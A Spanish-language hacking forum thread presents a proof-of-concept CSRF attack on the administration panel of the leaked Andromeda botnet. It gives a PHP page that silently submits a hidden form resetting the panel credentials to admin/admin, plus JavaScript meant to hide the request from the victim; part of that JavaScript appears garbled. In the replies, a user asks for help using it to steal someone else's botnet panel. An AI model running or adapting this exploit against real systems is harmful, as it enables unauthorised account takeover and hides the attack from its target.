CSRF Andromeda Botnet [ POC Change Password]

Iniciado por Matabarras, Julio 27, 2013, 10:57:18 AM

Tema anterior - Siguiente tema

0 Miembros y 1 Visitante están viendo este tema.

Imprimir
Ir Abajo Páginas1
Acciones del Usuario
Julio 27, 2013, 10:57:18 AM
Bueno despues de analizar la botnet Andromeda, despues de que la liberaran, (Podeis encontrarla aqui: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta) despues de encuentrar varias vulnerabilidades, pero que es normal que esten, como xss y demás..

Ya que se supone que solo va a utilizar el panel el administrador, y para que va a quererse hacer daño así mismo?.

Pero hasta que encontre, el directorio donde cambiamos nuestra contraseña etc etc..

Y no chequea el toquen ni el reffer, así que supose que seria vulnerable y empeze a crear el poc.

Más alla de todo, lo dificil es encontrar la web y el directorio, aunque si nos infectamos y conocemos a la persona.., pues se la podemos colar no?.

Bien, para no hacer tan descarado como siempre que público un csrf, utilizo el JS siguiente para camuflar.

Código: php
// This code was coded by FrenetikK & Mor3nako.


function writeIf(url) {
	document.write('');
}

writeIf('http://127.0.0.1/csrf.php');


Simplemente, si tenemos nuestro csrf subido a nuestra web: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta , y se llama csrf.php pues cambiamos el 127.0.0.1 por el de nuestra web sencillo no? xD.

Y en el index.html simplemente colocamos una redireccion hacia el JS. Supongamos que nuestro archivo se llama a.js.
Código: php
<script src="a.js"></script>


Pues aqui el csrf,
Código: php
<?php

//POC Change Password Andromeda Botnet
//codded: @Matabarras
$url = "web";
$form['newlogin'] = "admin";
$form['newpass1'] = "admin";
$form['newpass2']= "admin";

echo '<html><body onLoad="document.csrf.submit();">';
echo '<form name="csrf" action="http://'.$url.'/nombredeldirectorio/?act=service&subact=logindata" method="POST">';

foreach($form As $key=>$value) {
	echo '<input type="hidden" name="'.$key.'" value="'.$value.'">';
}
echo '</form></body></html>';
?>


Una vez entren a la web que no se daran cuenta de nada gracias al JS.

Se le cambiara el usuario y contraseña y para acceder a la web simplemente pondremos en usuario Admin y en contraseña lo dejamos vacio.

Un saludo
No esperes nada, vive la vida, y que los demas hagan lo que ellos creen.
Julio 29, 2013, 09:19:31 PM #1
peeerdona pero no entendi nada :S , subi el csrf en .php , a mi web , y tengo un cpanel de un botnet andromeda que no es mio , es de otro loco que no se qien es , pero mi idea era robar esa andromeda bot , pero no se cmo tendrias skype , facebook o algo? gracias :)
Julio 30, 2013, 07:46:47 PM #2
podrias ser mas especifico  o podes hacer un comentario en privado? ... gracias
Imprimir
Ir Arriba Páginas1
Acciones del Usuario